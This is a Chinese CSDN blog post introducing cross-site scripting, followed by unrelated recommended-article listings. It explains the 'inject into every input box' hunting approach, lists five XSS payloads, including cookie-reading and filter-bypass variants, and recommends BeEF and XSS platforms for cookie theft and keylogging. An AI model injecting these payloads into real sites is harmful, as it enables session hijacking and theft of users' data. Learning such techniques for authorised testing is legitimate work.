说好的见框就插呢?

最新推荐文章于 2024-11-01 16:03:12 发布
最新推荐文章于 2024-11-01 16:03:12 发布
阅读量112 收藏
点赞数 1
文章标签: 渗透测试 黑盒测试 网络安全 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43264067/article/details/131769093
版权
文章介绍了XSS漏洞的基础知识,包括其与数据注入的相似原理,强调用户输入数据被当作代码执行。提到了基础的“见框就插”方法,通过抓包和测试参数来寻找可能的注入点,并列举了一些常用的XSS攻击语句。此外,还推荐了beefxss和xss平台作为实用的XSS利用工具。
摘要由CSDN通过智能技术生成

说好的见框就插呢?

背景

每一个学安全的,都听说过一句话,挖XSS就是见框就插,不得不说这个方法很有用,但是经常遇到插不进去的情况。今天浅聊一下XSS漏洞
在这里插入图片描述

一句话讲原理

XSS原理和注入很像,核心也是用户输入的数据被当作代码执行了,一个是插入了数据库语句,一个是插入了JS语句

速挖XSS

(1)基础方法:

见框就插的原理是因为,http传参通常是通过这种方法传参的,本质是通过参数去传入xss语句,所以我们抓包对所有有参数的地方进行xss语句拼接会发现更多以前没发现的点

在这里插入图片描述
可以一个个插入恶意语句试试

(2)个人常用语句

每一个都很好用!

\u201c\u003e\u003cimg src=1 onerror=alert(document.cookie)\u003e
<img src=1 onerror=alert(document.cookie)>
%22onclick=prompt+1
1;{onerror=alert}throw 1337
"><img src=1 onerror = top['ale'+'rt'](1)>

(3)利用工具

分享个人经常使用的利用工具,可以屏幕截图,键盘记录,偷取cookie等操作

kali自带的beefxss工具很好用!
在这里插入图片描述
在这里插入图片描述

xss平台也很不错!
在这里插入图片描述

猫鼠信安
关注
ChatGPT 编写模式:如何高效地将思维架赋予 AI ?
Phodal's zenthink
02-22 1万+
如何理解 Prompt ?Prompt Enginneeringprompt 通常指的是一个输入的文本段落或短语,作为生成模型输出的起点或引导。prompt 可以是一个问题、一段文字描述、一段对话或任何形式的文本输入,模型会基于 prompt 所提供的上下文和语义信息,生成相应的输出文本。举个例子,对于一个语言模型,prompt 可以是 "The cat sat on the",模型可以通过对接下...
如何写好一篇技术型文档?
博客园地址
01-26 1万+
如何写好一篇技术型文档 周智 2022/1/20 参加工作时间久一点的工程师应该有这样一个体会:自己平时代码写得再多再好,可一旦要用文档去描述或者表达某一个事情或者问题时,都感觉非常困难,无从下手,不知道自己该写什么不该写什么;或者费了九牛二虎之力写出来的东西没法满足要求,需要再三去修改调整。这其中的主要原因我归纳有两点: 1.思维方式固化。大部分人平时代码写得太多,文字类型的表述又写得太少。而代码和文字明显是两种不同的思维方式,在代码里陷得太深,不容易跳出来; 2.本身文字表达能力有限。这个跟写代
Markdown中如何入视频 > iframe?
北岛向南的小站 - CSDN
01-12 1万+
关于Markdown中如何入视频这一问题   网上众说纷纭,一直也没找到一个确切的答案,想来也是,这些东西毕竟还不算成熟、各种以前提供过的方法现在来讲,可能在更新或是关闭大潮中又没了   而且,Markdown 这种结构,在不同的博客等可支持平台上,似乎某些细微之处或是一些特有规定也是不尽相同的。  话不多说,下面直接给出几个展示效果!   效果一
Python Web架哪家强? Django vs Flask深度对比
大江狗
09-02 2万+
对一个刚入门Web开发的新手而言,世界上最悲催的事莫过于花大力气学了一门语言或架却发现它已经要过气了。如果你刚刚开始使用Python进行Web开发,你一定想知道应该学习...
机械行业想转行IT互联网行业,大家有什么好的建议?
张晨光老师的播客
09-07 3022
这个是完全可以的我遇到过很多机械专业转行到计算机专业的转行的原因有很多有的是不喜欢机械有的是觉得这个行业没有计算机行业有前景有的是觉得机械行业太苦太累还不赚钱等等这些人,最后大多数也都转行成功了这么高的概率是为什么呢?
html入页码,Word添加页码后,每一页的页码都一样怎么办?
weixin_34321609的博客
07-02 2946
回答:Word文档中入页码的问题一、页码从第二页开始1、选择“入-页码”,打开“页码”对话。2、取消“首页显示页码”复选中的对钩,然后单击“格式”按钮,打开“页码格式”对话。3、“起始页码”后的中键入数字“0” 。4、按“确定”退出。二、页码从任意页开始1、将光标定位于需要开始编页码的页首位置。2、选择“入-分隔符”,打开“分隔符”对话,在“分隔符类型”下单击选中“下一页”单选钮。...
程序员如何写好技术文档?建议收藏
<sdffdsfsdfdfs>sfsfsfsdfsdffds</sdfsDS>Fsd
03-24 4819
????????关注后回复“进群”,拉你进程序员交流群????????作者:周智来源:www.cnblogs.com/xiaozhi_5638/p/15847859.html参加工作时间久一点的工程师应该有这样一个体会:自己平时代码写得再多再好,可一旦要用文档去描述或者表达某一个事情或者问题时,都感觉非常困难,无从下手,不知道自己该写什么不该写什么;或者费了九牛二虎之力写出来的东西没法满足要...
android 优秀架整理
热门推荐
黄孝果的博客
01-11 4万+
程序员界有个神奇的网站,那就是github,这个网站集合了一大批优秀的开源架,极大地节省了开发者开发的时间,在这里我进行了一下整理,这样可以使我们在使用到时快速的查找到,希望对大家有所帮助! 1. Retrofit   一句话介绍:Retrofit是一款类型安全的网络架,基于HTTP协议,服务于Android和java语言 上榜理由:Retrofit以21.8k的stars量雄踞gith
java导出特殊字符_java poi架导出excel如何入特殊字符(复选勾选)
weixin_35048266的博客
02-27 2254
java poi架导出excel如何入特殊字符(复选勾选)java poi架导出excel如何入特殊字符(复选勾选)java poi架导出excel如何入特殊字符(复选勾选)google了好久java导出excel如何导出复选勾选状态,没有找到可行的结果,实际操作了一下,要不就是导不出,要不就是导出之后不正确。先看看要导出的excel格式吧就是一个单元格中包含了中文和方的符号...
贵的键盘就一定好吗?程序员该怎样选择一款适合自己的键盘呢,来这里参考下吧
努力前行,总会成为自己心中的那道光
11-16 4万+
作为一个程序员,每天跟我们打交道最多的应该就是我们的电脑了。 而说起电脑自然就得来提一提 键盘⌨️ 和 鼠标🖱️ 啦! 键盘 是最常用也是最主要的输入设备,通过键盘可以将英文字母、汉字、数字、标点符号等输入到计算机中,从而向计算机发出命令、输入数据等。 下面本篇文章就来介绍一下关于 键盘的一些常规踩坑点,让我们可以选择一款适合自己键盘吧! 顺便来简单给大家推荐一款我觉得很好用的键盘:keychron K4
使用SVD(Stable Video Diffusion)执行视频帧任务
沉迷单车的追风少年
10-02 1159
使用生成式模型完成视频帧任务相比于传统的方法有很大的优势,可以完成大运动幅度和更好的流畅性帧任务。这篇博客介绍如何用目前最流行的视频生成开源模型SVD完成视频帧任务。
女朋友要我教她CSS,我就写了这一篇长文,感动哭了?
超逸の学习技术博客
05-30 9686
女朋友她又要我教她CSS,这4w字长文够了吗?她会被感动到吗?
adguard和adblock哪个好_Chrome 屏蔽广告的扩展 AdBlock 和 Adblock Plus 哪个更强大?
weixin_39647180的博客
12-18 4494
应大家多次要求,把Adblock Plus创始人Wladimir Palant这篇私人的博文翻译成中文。希望能解决一些困扰了大家很久的疑问。感谢大家一直以来对Adblock Plus的支持,我们会按照初衷把更好更完善更安全的Adblock Plus呈献给大家!谁更好?Adblock还是Adblock Plus?注:明确说明此文章发布于我的私人博客,而非Adblock Plus官方博客。本文仅代表我...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8530
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于 SM3 的密钥派生函数 (KDF):国密合规的安全密钥生成方案
A_Lonely_Smile的博客
10-29 963
在现代加密技术中,密钥派生函数(Key Derivation Function, KDF)是一个将初始输入(如密码、共享密钥等)转换为安全密钥的过程,用于实现加密、消息认证等密码操作。特别是在符合国密标准的场景中,基于 SM3 的 KDF 已成为一种常用的密钥生成方式。本文将详细讲解 SM3-KDF 的工作原理,逐步介绍其实现过程,并提供 Java 代码示例,帮助您理解如何在项目中应用 SM3-KDF。
前端如何安全存储密钥,防止信息泄露
AM1n98的博客
10-30 1225
把公钥写在前端代码文件里被公司检测到了要整改,整理几种常的前端密钥存储方案。
冷钱包与热钱包的差异 | 加密货币存储的安全方案
最新发布
tusik68的博客
11-01 1152
想要安全存储加密货币?了解冷钱包和热钱包的核心差异,找到适合的存储方式,确保您的数字资产安全无忧。
轻型民用无人驾驶航空器安全操控理论培训知识总结-多旋翼部分
Lizzy_Fly的博客
10-30 871
15.航空器的视觉避障只有在光照等环境条件满足视觉系统工作要求时才能生效,光照条件特别暗或者特别亮的情况下,请谨慎飞行,即使视觉系统正常工作时,也可能无法精准识别高压线,而且高压线还会影响图传和遥控信号,因此不建议在高压线间飞行,如因电力巡检等工作原因必须在此环境下飞行,建议经专门培训后再进行操作;当航空器记录了返航点并且在定位服务良好的情况下,航空器电池电量不足、遥控器与航空器之间失去通讯信号以及图传信号丢失时,将会触发自动返航,操控员也可主动开启自动返航,航空器将自动返回返航点并降落。
【Python爬虫实战】网络爬虫完整指南:HTTP/HTTPS协议与爬虫安全实践
小火龙的博客
10-29 1111
是互联网的核心协议之一,用于在客户端(如浏览器或爬虫)和服务器之间传输数据。HTTP协议定义了请求和响应的格式,帮助不同设备进行信息交换,例如我们在浏览网页时,浏览器就是通过HTTP向服务器请求页面内容,然后显示在用户面前。是HTTP协议的升级版,通过SSL/TLS加密协议增强了数据传输的安全性。HTTPS协议会在数据传输过程中对数据进行加密,防止中途被拦截或篡改,因此在保护用户隐私和敏感信息方面起到了重要作用。
微服务RPC架解析:Dubbo、Motan、Tars、SpringCloud、gRPC、Thrift
本文介绍了6种微服务RPC架,包括Dubbo、Motan、Tars、SpringCloud、gRPC和Thrift,分析了它们的主要特点和适用场景。 RPC(Remote Procedure Call)架是用于分布式系统间远程调用的工具,它使得服务间的通信变...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

猫鼠信安

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值